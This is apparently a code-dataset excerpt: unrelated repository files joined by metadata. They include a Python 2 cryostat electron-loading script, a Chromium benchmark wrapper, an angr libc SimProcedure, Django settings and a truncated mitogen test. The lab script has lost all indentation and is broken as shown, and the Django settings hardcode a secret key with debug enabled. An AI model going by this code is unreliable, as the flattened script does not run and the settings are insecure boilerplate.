from data_cache import dataCacheProxy
from time import sleep, time, strftime
from setup_instruments import fridge, seekat, yoko1, nwa, filament
from resonance_fitting import fit_res_gerwin
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
import os
from shutil import copyfile
import quicktimetrace_4D as fastsweep
# dsfit and dataanalysis are used by take_trace_and_save() below for the Lorentzian fit;
# they are assumed here to be local analysis modules available on the path.
import dsfit
import dataanalysis
this_script = r"0019_electron_loading_trap_studies_E5071C.py"
expt = 'spectral_scan'
#res = seekat
t0 = time()
if __name__ == "__main__":
today = strftime("%y%m%d")
now = strftime("%H%M%S")
expt_path = os.path.join(r'S:\_Data\170422 - EonHe M018V6 with L3 etch\data', today, "%s_electron_loading_2D_resg_trap" % now)
print "Saving data in %s" % expt_path
if not os.path.isdir(expt_path):
os.makedirs(expt_path)
sleep(1)
copyfile(os.path.join(r"S:\_Data\170422 - EonHe M018V6 with L3 etch\experiment", this_script),
os.path.join(expt_path, this_script))
dataCache = dataCacheProxy(file_path=os.path.join(expt_path, os.path.split(expt_path)[1] + ".h5"))
prefix = "electron_loading"
fridgeParams = {'wait_for_temp': 0.080,
'min_temp_wait_time': 60}
filamentParams = {"amplitude": 4.2,
"offset": -0.5,
"frequency": 113e3,
"duration": 40e-3}
pulseParams = {"delay": .00,
"pulses": 200}
def set_voltages(res, trap, res_guard, trap_guard, pinch=None, verbose=True):
if res is not None:
seekat.set_voltage(1, res, verbose=verbose)
if trap is not None:
seekat.set_voltage(2, trap, verbose=verbose)
if res_guard is not None:
seekat.set_voltage(3, res_guard, verbose=verbose)
if trap_guard is not None:
seekat.set_voltage(4, trap_guard, verbose=verbose)
if pinch is not None:
seekat.set_voltage(5, pinch, verbose=verbose)
dataCache.post("voltage_log", np.array([time(),
seekat.get_voltage(1), seekat.get_voltage(2),
seekat.get_voltage(3), seekat.get_voltage(4),
seekat.get_voltage(5)]))
def get_voltages():
return seekat.get_voltage(1), seekat.get_voltage(2), seekat.get_voltage(3), \
seekat.get_voltage(4), seekat.get_voltage(5)
filament.setup_driver(**filamentParams)
filament.set_timeout(10000)
print filament.get_id()
def unload():
print "********************"
print "UNLOADING ELECTRONS!"
print "********************"
for k in range(5):
print "\tStep %d"%(k+1)
for volts in [-1, -2, -3, -4, -3, -2, -1]:
set_voltages(volts, volts, volts, volts, verbose=False)
sleep(0.5)
def unload_trap(start=-3.0, stop=-5.0):
print "********************"
print "UNLOADING TRAP ONLY!"
print "********************"
res_init, trap_init, res_guard_init, trap_guard_init, pinch = get_voltages()
vs = list(np.arange(start, stop, -1)) +\
list(np.arange(stop, start, +1))
for k in range(5):
print "\tStep %d"%(k+1)
for volts in vs:
set_voltages(res_init, volts, res_guard_init, trap_guard_init, verbose=False)
sleep(0.5)
set_voltages(res_init, trap_init, res_guard_init, trap_guard_init)
def take_trace_and_save(averages, do_fit=False):
temperature = fridge.get_mc_temperature()
dataCache.post('temperature', temperature)
Vres, Vtrap, Vrg, Vtg, Vpinch = get_voltages()
dataCache.post('Vres', Vres)
dataCache.post('Vtrap', Vtrap)
dataCache.post('Vpinch', Vpinch)
dataCache.post('Vrg', Vrg)
dataCache.post('Vtg', Vtg)
if averages > 1:
fpts, mags, phases = nwa.take_one_averaged_trace()
else:
fpts, mags, phases = nwa.take_one()
if do_fit:
fitspan = 2E6;
center_freq = fpts[np.argmax(mags)]
try:
fitres = dsfit.fitlor(fpts, dataanalysis.dBm_to_W(mags),
domain=[center_freq - fitspan / 2., center_freq + fitspan / 2.])
dataCache.post('f0', fitres[2])
except:
print "FIT FAILED!"
if np.max(mags) < -55:
print "WARNING: PEAK OUT OF RANGE!"
#else:
#nwa.set_center_frequency(fitres[2])
dataCache.post('fpts', fpts)
dataCache.post('mags', mags)
dataCache.post('phases', phases)
dataCache.post('time', time() - t0)
return temperature
def unload_with_filament():
# First loading to get rid of most electrons!
if load_electrons:
set_voltages(-3.0, -3.0, 0.0, 0.0)
sleep(2.0)
temperature = fridge.get_mc_temperature()
print "Waiting for consistent electron loading temperature of < 550 mK...."
while temperature > 0.550:
temperature = fridge.get_mc_temperature()
sleep(2)
print '.',
filament.fire_filament(100, 0.01)
print "Fired filament!"
sleep(60.0)
def load_resonator_not_trap():
print "\n"
print "********************"
print "LOADING ELECTRONS..."
print "********************"
set_voltages(2.0, -3.0, 0.0, 0.0)
sleep(2.0)
temperature = fridge.get_mc_temperature()
print "Waiting for consistent electron loading temperature of < 550 mK...."
while temperature > 0.550:
temperature = fridge.get_mc_temperature()
sleep(2)
print '.',
filament.fire_filament(100, 0.01)
print "Fired filament!"
sleep(60.0)
not_settled = True
stable_temp = 0.550
# print "Waiting for temperature to stabilize to %.0f mK..." % (stable_temp * 1E3)
while not_settled:
temperature = fridge.get_mc_temperature()
if temperature <= stable_temp:
not_settled = False
nwa.set_measure('S21')
set_voltages(0.00, 0.00, 0.00, 0.00, pinch=0.00)
unload()
load_electrons = True
power = -40
averages = 25
sweep_points = 801
nwa.set_trigger_source('BUS')
nwa.set_format('SLOG')
nwa_config = {'start' : 6.385E9,
'stop': 6.407E9,
'sweep_points': sweep_points,
'power': power,
'averages': averages,
'ifbw': nwa.get_ifbw()}
nwa.configure(**nwa_config)
nwa.set_electrical_delay(68E-9)
nwa.set_phase_offset(180.0)
dataCache.set_dict('nwa_config', nwa_config)
nwa.auto_scale()
Vresguards = list(np.arange(0.00, 0.15+0.025, +0.025))
Vtraps = list(np.arange(0.00, 0.25, 0.005)) \
+ list(np.arange(0.25, 0.00, -0.005))
Vress = 0.6 * np.ones(len(Vtraps))
fig = plt.figure(figsize=(8.,12.))
plt.subplot(311)
plt.plot(Vress, 'o', color="#23aaff", markeredgecolor="none", label="Resonator")
plt.plot(Vtraps, 'o', color="#f4b642", markeredgecolor="none", label='Trap')
plt.ylabel("Resonator voltage (V)")
plt.xlim(0, np.max([len(Vress), len(Vtraps)]))
plt.legend(loc=0, prop={'size' : 8})
if averages > 1:
fpts, mags, phases = nwa.take_one_averaged_trace()
else:
fpts, mags, phases = nwa.take_one()
plt.subplot(312)
current_vres, current_vtrap, current_vrg, current_vtg, pinch = get_voltages()
plt.text(np.min(fpts) + 0.10*(np.max(fpts)-np.min(fpts)),
np.min(mags) + 0.85*(np.max(mags) - np.min(mags)),
"res, trap, rg, tg = (%.2fV, %.2fV, %.2fV, %.2fV)" % (current_vres, current_vtrap, current_vrg, current_vtg))
plt.plot(fpts, mags)
plt.xlabel('Frequency (Hz)')
plt.ylabel('Magnitude (dB)')
plt.xlim(np.min(fpts), np.max(fpts))
plt.subplot(313)
plt.plot(fpts, phases)
plt.xlabel('Frequency (Hz)')
plt.ylabel('Phase (deg)')
plt.xlim(np.min(fpts), np.max(fpts))
fig.savefig(os.path.join(expt_path, "pre_electron_loading.png"), dpi=200)
plt.show()
nwa.set_format('MLOG')
nwa.auto_scale()
nwa.set_trigger_source('INT')
#unload_with_filament()
nwa.set_trigger_source('BUS')
nwa.set_format('SLOG')
nwa.set_average_state(True)
if load_electrons:
abs_deltaf = 1e9
Q = 0
# Set both the Q and deltaf threshold to something low if you want it to continue after the first load
while not (Q > 9000 and abs_deltaf > 6.5E6):
unload_with_filament()
load_resonator_not_trap()
set_voltages(0.6, -2.0, None, None)
sleep(1.0)
#set_voltages(Vress[0], Vtraps[0], None)
if averages > 1:
fpts, mags, phases = nwa.take_one_averaged_trace()
else:
fpts, mags, phases = nwa.take_one()
f0, Q = fit_res_gerwin(fpts, mags, span=3E6)
abs_deltaf = np.abs(f0-6.40511e9)
print "Fit result after loading: delta f = %.2f MHz and Q = %.0f" % (abs_deltaf/1E6, Q)
sleep(120)
nwa.set_center_frequency(f0+0.15E6)
nwa.set_span(3E6)
print "Set center frequency to %.6f GHz (shift = %.2f MHz)"%(f0/1E9, (f0-6.40511e9)/1E6)
dataCache.post('data_shape', [len(Vresguards), len(Vtraps)])
set_voltages(None, None, 0.00, 0.00)
print "Starting sweep..."
set_voltages(Vress[0], Vtraps[0], Vresguards[0], None, -1.00)
for Vrg in Vresguards:
set_voltages(None, None, Vrg, None)
for Vtrap in tqdm(Vtraps):
set_voltages(None, Vtrap, None, None)
take_trace_and_save(averages, do_fit=True)
# for Vrg in Vresguards:
# set_voltages(None, None, Vrg, None)
# for Vtrap in tqdm(Vtraps):
# set_voltages(None, Vtrap, None, None)
# take_trace_and_save(averages, do_fit=True)
nwa.set_format('MLOG')
nwa.auto_scale()
nwa.set_trigger_source('INT')
|
[
"yangge1987@gmail.com"
] |
yangge1987@gmail.com
|
d1ef46174618edcfd908c875a157a06da832d91a
|
602ea0c05970cbd766df068b003671c561f59661
|
/tools/perf/benchmarks/jetstream2.py
|
19f31f16c1bc952e688b1bb19284defef99e3e9d
|
[
"LicenseRef-scancode-unknown-license-reference",
"LGPL-2.0-or-later",
"MIT",
"BSD-3-Clause",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.0-only",
"APSL-2.0",
"LicenseRef-scancode-unknown",
"Zlib"
] |
permissive
|
VitalyKononenko/chromium
|
088de78a639375b073cabb7665afc638334e8672
|
b8ad2cadb6a163269cd7851bc7962744743785bd
|
refs/heads/master
| 2023-03-01T10:15:00.815394
| 2019-08-15T19:51:40
| 2019-08-15T19:51:40
| 202,603,102
| 1
| 0
|
BSD-3-Clause
| 2019-08-15T19:54:34
| 2019-08-15T19:54:33
| null |
UTF-8
|
Python
| false
| false
| 1,655
|
py
|
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs Apple's JetStream 2 benchmark.
JetStream 2 combines together a variety of JavaScript and Web Assembly
benchmarks, covering a variety of advanced workloads and programming
techniques, and reports a single score that balances them using a geometric
mean.
Each benchmark measures a distinct workload, and no single optimization
technique is sufficient to speed up all benchmarks. Some benchmarks
demonstrate tradeoffs, and aggressive or specialized optimizations for one
benchmark might make another benchmark slower. JetStream 2 rewards browsers
that start up quickly, execute code quickly, and continue running smoothly.
Each benchmark in JetStream 2 computes its own individual score. JetStream 2
weighs each benchmark equally, taking the geometric mean over each individual
benchmark's score to compute the overall JetStream 2 score.
"""
from telemetry import benchmark
import page_sets
from benchmarks import press
@benchmark.Info(emails=['hablich@chromium.org', 'tcwang@chromium.org'],
component='Blink>JavaScript',
documentation_url='https://browserbench.org/JetStream/in-depth.html')
class Jetstream2(press._PressBenchmark): # pylint: disable=protected-access
"""JetStream2, a combination of JavaScript and Web Assembly benchmarks.
Run all the Jetstream 2 benchmarks by default.
"""
@classmethod
def Name(cls):
return 'UNSCHEDULED_jetstream2'
def CreateStorySet(self, options):
return page_sets.Jetstream2StorySet()
|
[
"commit-bot@chromium.org"
] |
commit-bot@chromium.org
|
1c412f4178575b10412fd80ba6e0c1dd27a43979
|
98cd4b641929e35cd3482b058e00ef7d0a151126
|
/Hafta3_Odev_2.py
|
f4a0709fe786e38511049dd3e91b7eff0e4fe905
|
[] |
no_license
|
organichacker/KOU_Python
|
60abaa9cf5eec1d0509d9d7113f152ee60e30cfa
|
d4534d94ef7a32c2e684f5baaac2a7ff30dee96b
|
refs/heads/main
| 2023-04-25T09:01:51.586110
| 2021-05-22T14:20:48
| 2021-05-22T14:20:48
| 365,274,296
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 309
|
py
|
import pandas as pd
Kaynak = pd.read_csv('C:\\Python\\Project\\Deneme\\top50.csv',usecols=['Unnamed: 0','Track.Name','Genre','Danceability'])
Kaynak_Genre = Kaynak['Genre'][:]
import matplotlib.pyplot as plt
y = Kaynak['Danceability'][:]
x = Kaynak['Unnamed: 0'][:]
plt.barh(x, y, height = 0.1)
plt.show()
|
[
"noreply@github.com"
] |
noreply@github.com
|
4de20f0109cf70e5f728227b677b37923f8e3e0d
|
06fa929e73ba42d6f96605d8bbde674c5e2f0639
|
/01-open-read-pwd.py
|
29dde0d54f7a94764aeabe7a3dec677ebd979bbf
|
[] |
no_license
|
biagiola/python-file-manipulation
|
6b25e560a4373ff8e0fa136bb07cd70ee8329e1b
|
a29def48ee13353feab191f85faadac3736f6868
|
refs/heads/main
| 2022-12-22T01:14:48.738913
| 2020-10-02T15:50:11
| 2020-10-02T15:50:11
| 300,651,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 170
|
py
|
import os
g = open('data', 'rt')
f = open("data.txt", "r")
for x in f:
print(x)
print('Entire file: \n', g.read())
print(g.readlines())
print(os.system("pwd"))
|
[
"marcelobiagiola01@gmail.com"
] |
marcelobiagiola01@gmail.com
|
5457ca422d13650a936b6813af9e0f7264ec44b1
|
055ce5ca01b45127efee13b9a8fcfaa7fe4813e5
|
/oo/attributemethod/property.py
|
14f3e5d09ab40eb1ccd007adf34017141d7ae65f
|
[] |
no_license
|
PeihongKe/pythonRecipes
|
0afe96a05518e5445a3267be0c517bfc424b386f
|
d5d65628e3ffc6c9cdf8641932fa6bff407a92d0
|
refs/heads/master
| 2021-01-01T04:25:00.590994
| 2018-07-20T22:28:03
| 2018-07-20T22:28:03
| 97,172,806
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,344
|
py
|
import math
import util
# with property, it is safe to use public data attributes, as you can always add an abstraction on top of them whenever necessary
class Rectangle(object):
""" """
def __init__(self, width, height):
self.width = width
self.height = height
def get_area(self):
""" as it says """
return self.width * self.height
read_only_area = property(fget=get_area, doc='area of the rectangle ')
not_allowed_area = property(fget=None, fset=None, fdel=None, doc=None)
@property # the x property. the decorator creates a read-only property
def read_only_area_decorator(self):
""" readonly using decorator """
return self.width * self.height
@property
def read_write_area_decorator(self):
return self.width * self.height
@read_write_area_decorator.setter
def read_write_area_decorator(self, value):
scale = math.sqrt(value / self.read_write_area_decorator)
self.width *= scale
self.height *= scale
class TestProperty(util.TestCaseBase):
""" property(fget=None, fset=None, fdel=None, doc=None) """
def test_read_only_property(self):
""" read only """
r = Rectangle(2, 4)
self.assertEqual(r.read_only_area, 8)
def test_not_allowed_area(self):
""" disallowed property"""
r = Rectangle(2, 4)
with self.assertRaises(AttributeError) as err:
r.not_allowed_area
msg = str(err.exception)
self.assertEqual(msg, 'unreadable attribute')
def test_read_only_area_decorator(self):
""" read only using property """
r = Rectangle(2, 4)
self.assertEqual(r.read_only_area_decorator, 8)
def test_read_write_area_decorator(self):
""" read write using property """
r = Rectangle(2, 4)
self.assertEqual(r.read_only_area_decorator, 8)
r.read_write_area_decorator = 32
self.assertEqual(r.width, 4.0)
self.assertEqual(r.height, 8.0)
def test_property_inheritance(self):
""" """
class Base(object):
def f(self):
return 'base::f'
g = property(f)
class Derive(Base):
def f(self):
return 'drive::f'
d = Derive()
self.assertEqual(d.g, 'base::f')
|
[
"pkukph@hotmail.com"
] |
pkukph@hotmail.com
|
6b354ee59c681faf08710f4c4a73bf94b911ddca
|
33af6185b48bd76f97f0a74390a3a812ee216c78
|
/angr/angr/procedures/glibc/__libc_start_main.py
|
12aa852769b769b404e992c1b45228fc1eb2aa92
|
[
"BSD-2-Clause"
] |
permissive
|
Ruide/angr-dev
|
dab0cabd907fce47ac698f890c3f3a8b80ab7e2a
|
964dc80c758e25c698c2cbcc454ef5954c5fa0a0
|
refs/heads/master
| 2022-11-10T11:27:13.355024
| 2017-10-07T14:29:09
| 2017-10-07T14:29:09
| 104,417,044
| 0
| 1
|
BSD-2-Clause
| 2022-10-16T04:48:10
| 2017-09-22T01:35:12
|
C
|
UTF-8
|
Python
| false
| false
| 8,177
|
py
|
import logging
import pyvex
import angr
l = logging.getLogger("angr.procedures.glibc.__libc_start_main")
######################################
# __libc_start_main
######################################
class __libc_start_main(angr.SimProcedure):
#pylint:disable=arguments-differ,unused-argument,attribute-defined-outside-init
ADDS_EXITS = True
NO_RET = True
IS_FUNCTION = True
local_vars = ('main', 'argc', 'argv', 'init', 'fini')
def _initialize_b_loc_table(self):
"""
Initialize ptable for ctype
See __ctype_b_loc.c in libc implementation
"""
malloc = angr.SIM_PROCEDURES['libc']['malloc']
table = self.inline_call(malloc, 768).ret_expr
table_ptr = self.inline_call(malloc, self.state.arch.bits / 8).ret_expr
for pos, c in enumerate(self.state.libc.LOCALE_ARRAY):
# Each entry is 2 bytes
self.state.memory.store(table + (pos*2),
self.state.se.BVV(c, 16),
endness=self.state.arch.memory_endness,
inspect=False,
disable_actions=True,
)
# Offset for negative chars
# 256 because 2 bytes each, -128 * 2
table += 256
self.state.memory.store(table_ptr,
table,
size=self.state.arch.bits / 8,
endness=self.state.arch.memory_endness,
inspect=False,
disable_actions=True,
)
self.state.libc.ctype_b_loc_table_ptr = table_ptr
def _initialize_tolower_loc_table(self):
"""
Initialize ptable for ctype
See __ctype_tolower_loc.c in libc implementation
"""
malloc = angr.SIM_PROCEDURES['libc']['malloc']
# 384 entries, 4 bytes each
table = self.inline_call(malloc, 384*4).ret_expr
table_ptr = self.inline_call(malloc, self.state.arch.bits / 8).ret_expr
for pos, c in enumerate(self.state.libc.TOLOWER_LOC_ARRAY):
self.state.memory.store(table + (pos * 4),
self.state.se.BVV(c, 32),
endness=self.state.arch.memory_endness,
inspect=False,
disable_actions=True,
)
# Offset for negative chars: -128 index (4 bytes per index)
table += (128 * 4)
self.state.memory.store(table_ptr,
table,
size=self.state.arch.bits / 8,
endness=self.state.arch.memory_endness,
inspect=False,
disable_actions=True,
)
self.state.libc.ctype_tolower_loc_table_ptr = table_ptr
def _initialize_toupper_loc_table(self):
"""
Initialize ptable for ctype
See __ctype_toupper_loc.c in libc implementation
"""
malloc = angr.SIM_PROCEDURES['libc']['malloc']
# 384 entries, 4 bytes each
table = self.inline_call(malloc, 384*4).ret_expr
table_ptr = self.inline_call(malloc, self.state.arch.bits / 8).ret_expr
for pos, c in enumerate(self.state.libc.TOUPPER_LOC_ARRAY):
self.state.memory.store(table + (pos * 4),
self.state.se.BVV(c, 32),
endness=self.state.arch.memory_endness,
inspect=False,
disable_actions=True,
)
# Offset for negative chars: -128 index (4 bytes per index)
table += (128 * 4)
self.state.memory.store(table_ptr,
table,
size=self.state.arch.bits / 8,
endness=self.state.arch.memory_endness,
inspect=False,
disable_actions=True,
)
self.state.libc.ctype_toupper_loc_table_ptr = table_ptr
def _initialize_ctype_table(self):
self._initialize_b_loc_table()
self._initialize_tolower_loc_table()
self._initialize_toupper_loc_table()
@property
def envp(self):
return self.argv + (self.argc+1)*self.state.arch.bytes
def run(self, main, argc, argv, init, fini):
# TODO: handle symbolic and static modes
# TODO: add argument types
self._initialize_ctype_table()
self.main, self.argc, self.argv, self.init, self.fini = self._extract_args(self.state, main, argc, argv, init,
fini)
# TODO: __cxa_atexit calls for various at-exit needs
self.call(self.init, (self.argc, self.argv, self.envp), 'after_init')
def after_init(self, main, argc, argv, init, fini, exit_addr=0):
if isinstance(self.state.arch, ArchAMD64):
# (rsp+8) must be aligned to 16 as required by System V ABI
# ref: http://www.x86-64.org/documentation/abi.pdf , page 16
self.state.regs.rsp = (self.state.regs.rsp & 0xfffffffffffffff0) - 8
self.call(self.main, (self.argc, self.argv, self.envp), 'after_main')
def after_main(self, main, argc, argv, init, fini, exit_addr=0):
self.exit(0)
def static_exits(self, blocks):
# Execute those blocks with a blank state, and then dump the arguments
blank_state = angr.SimState(project=self.project, mode="fastpath")
# set up the stack pointer
blank_state.regs.sp = 0x7fffffff
# Execute each block
state = blank_state
for b in blocks:
# state.regs.ip = next(iter(stmt for stmt in b.statements if isinstance(stmt, pyvex.IRStmt.IMark))).addr
irsb = angr.SimEngineVEX().process(state, b,
force_addr=next(iter(stmt for stmt in b.statements if isinstance(stmt, pyvex.IRStmt.IMark))).addr)
if irsb.successors:
state = irsb.successors[0]
else:
break
cc = angr.DEFAULT_CC[self.arch.name](self.arch)
args = [ cc.arg(state, _) for _ in xrange(5) ]
main, _, _, init, fini = self._extract_args(blank_state, *args)
all_exits = [
(init, 'Ijk_Call'),
(main, 'Ijk_Call'),
(fini, 'Ijk_Call'),
]
return all_exits
@staticmethod
def _extract_args(state, main, argc, argv, init, fini):
"""
Extract arguments and set them to
:param angr.sim_state.SimState state: The program state.
:param main: An argument to __libc_start_main.
:param argc: An argument to __libc_start_main.
:param argv: An argument to __libc_start_main.
:param init: An argument to __libc_start_main.
:param fini: An argument to __libc_start_main.
:return: A tuple of five elements: (main, argc, argv, init, fini)
:rtype: tuple
"""
main_ = main
argc_ = argc
argv_ = argv
init_ = init
fini_ = fini
if state.arch.name == "PPC32":
# for some dumb reason, PPC passes arguments to libc_start_main in some completely absurd way
argv_ = argc_
argc_ = main_
main_ = state.mem[state.regs.r8 + 4:].int.resolved
init_ = state.mem[state.regs.r8 + 8:].int.resolved
fini_ = state.mem[state.regs.r8 + 12:].int.resolved
elif state.arch.name == "PPC64":
main_ = state.mem[state.regs.r8 + 8:].long.resolved
init_ = state.mem[state.regs.r8 + 16:].long.resolved
fini_ = state.mem[state.regs.r8 + 24:].long.resolved
return main_, argc_, argv_, init_, fini_
from archinfo import ArchAMD64
|
[
"rd.cheung.bupt.sms@gmail.com"
] |
rd.cheung.bupt.sms@gmail.com
|
093e8e15f82513ecd3e94e0d7205c22368aed6b9
|
198b3dc76290ab6b76713db849495ec4102e8ece
|
/Step-3/step3.py
|
f303d64cb0d7e72f8d1480df33d6446107595e36
|
[] |
no_license
|
PabloRdrRbl/my-12-steps-navier-stokes
|
efa40426b2fbc86fd4f34ee50ccddd18dece3942
|
f38135bb5fa1955d12008abd2076df2cbc567301
|
refs/heads/master
| 2021-01-20T20:15:18.994548
| 2016-07-11T23:15:56
| 2016-07-11T23:15:56
| 62,781,940
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,138
|
py
|
import numpy as np
import matplotlib.pyplot as plt
def linearconv(nx):
dx = 2 / (nx - 1) # Spatial domain has 2 units length
nt = 25 # Number of time steps
sigma = 0.2
nu = 0.3 # Viscosity
# Courant number, CFL condition
# CFL < 1
dt = sigma * dx**2 / nu
# Initial conditions
u = np.ones(nx)
    u[int(0.5 / dx): int(1 / dx + 1)] = 2  # u = 2 between 0.5 and 1 (slice indices must be ints)
# Printing u
plt.plot(np.linspace(0, 2, nx), u)
un = np.ones(nx) # Initialize a temporary array
# Solution
for n in range(nt):
un = u.copy()
for i in range(1, nx - 1):
u[i] = (un[i] + nu * dt / dx**2 *
(un[i + 1] - 2 * un[i] + un[i - 1]))
# Printing the new u
plt.plot(np.linspace(0, 2, nx), u)
    plt.title(r'Using $nx = %d$ and $\sigma = %1.1f$' % (nx, sigma))
plt.savefig('image_output/u_profile_sigma_%d_nx_%d.png' % (sigma * 10, nx))
# plt.show()
# Cleaning the figure
# [http://stackoverflow.com/questions/8213522/matplotlib-
# clearing-a-plot-when-to-use-cla-clf-or-close]
plt.clf()
if __name__ == '__main__':
linearconv(41)
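# Hedged worked note (not part of the original script): the explicit scheme above is
# stable when sigma = nu*dt/dx**2 <= 0.5. For nx = 41: dx = 2/40 = 0.05,
# dt = 0.2 * 0.05**2 / 0.3 ≈ 1.67e-3, so the 25 steps span roughly 0.042 time units.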
|
[
"prodrr05@estudiantes.unileon.es"
] |
prodrr05@estudiantes.unileon.es
|
26430b17c1584bfa3251927a4d94dab96ff51f73
|
fc9f2add016408d650ef273d9fe113f96dda4f06
|
/sum.py
|
8fc0c4bfeb5b9eb965672ce157f566269ad13818
|
[] |
no_license
|
takatsugu21/gitTest
|
a973e99686b099652a32d54dda1c6c50e50bf071
|
9ecf525c982a55755547e01fc108c599f1e933c7
|
refs/heads/develop
| 2023-05-04T19:20:00.700738
| 2023-04-27T09:37:09
| 2023-04-27T09:37:09
| 339,895,009
| 0
| 0
| null | 2023-04-27T09:37:58
| 2021-02-18T00:43:58
|
Python
|
UTF-8
|
Python
| false
| false
| 35
|
py
|
answer: int = 1 + 2
print(answer)
|
[
"takyama@nttpc.co.jp"
] |
takyama@nttpc.co.jp
|
b3bcc9971980112e5416187d1d42f22e61ee3885
|
ce93b078ac34a797e3950077fd0c226519e9930e
|
/venv/Scripts/easy_install-3.7-script.py
|
6c9212e7e98fe7d0a32ec9db20e22a05c23e1016
|
[] |
no_license
|
chetanpant11/HackerRankCompetitiveProgramming
|
9b8890a6ced45da700c2ba0586b208b8fef574db
|
0596d4a29a3abb9e5bc922d05e60c231fc50a46a
|
refs/heads/master
| 2020-06-12T22:11:18.447900
| 2020-06-02T14:09:12
| 2020-06-02T14:09:12
| 194,443,099
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 469
|
py
|
#!"C:\Users\CHETAN PANT\PycharmProjects\Hackerrank\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.7')()
)
|
[
"chetanpant87@gmail.com"
] |
chetanpant87@gmail.com
|
021e4fcee7a62e92f84e0a057de120f6f6d67961
|
6c8f3ab5f952d986a17edda582c5a039bf65c632
|
/django/consolidate_project/consolidate_project/settings.py
|
08a82252a1c6016afd3b14e4b91661d7bd5f4c59
|
[] |
no_license
|
phillipn/coding_bootcamp_projects
|
3d3bd697728dd4502267e0cd2be7a090952029a8
|
278f96df9d256364583654a00fe585d474ea86a1
|
refs/heads/master
| 2021-01-17T17:30:14.607944
| 2017-03-19T18:12:32
| 2017-03-19T18:12:32
| 82,971,619
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,218
|
py
|
"""
Django settings for consolidate_project project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'tqgt7)2b(iphav%!(5-e1(6kk%x=*o^#&i_aa_ab55)t0xgj5_'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'apps.login',
'apps.registration',
'apps.turtles',
'apps.classes',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'consolidate_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'consolidate_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
|
[
"phillipn101@gmail.com"
] |
phillipn101@gmail.com
|
580f96d5338bff027bec064c4f87a82504567a6d
|
9cd9e89359f0da1750a19f0609619e3bbe4c536e
|
/tests/fork_test.py
|
61c0e16d67a73a9a7ee9b0fcc4c582058fe208d0
|
[
"BSD-3-Clause"
] |
permissive
|
ph448/mitogen
|
e961c95578c852908e33861da7226919547070f0
|
c24d29d3676aa122e25716450246306aaf4a797b
|
refs/heads/master
| 2020-03-19T01:48:11.362786
| 2018-05-28T05:00:57
| 2018-05-28T05:00:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,219
|
py
|
import ctypes
import os
import random
import ssl
import struct
import sys
import mitogen
import unittest2
import testlib
import plain_old_module
IS_64BIT = struct.calcsize('P') == 8
PLATFORM_TO_PATH = {
('darwin', False): '/usr/lib/libssl.dylib',
('darwin', True): '/usr/lib/libssl.dylib',
('linux2', False): '/usr/lib/libssl.so',
('linux2', True): '/usr/lib/x86_64-linux-gnu/libssl.so',
}
c_ssl = ctypes.CDLL(PLATFORM_TO_PATH[sys.platform, IS_64BIT])
c_ssl.RAND_pseudo_bytes.argtypes = [ctypes.c_char_p, ctypes.c_int]
c_ssl.RAND_pseudo_bytes.restype = ctypes.c_int
def ping():
return 123
def random_random():
return random.random()
def RAND_pseudo_bytes(n=32):
buf = ctypes.create_string_buffer(n)
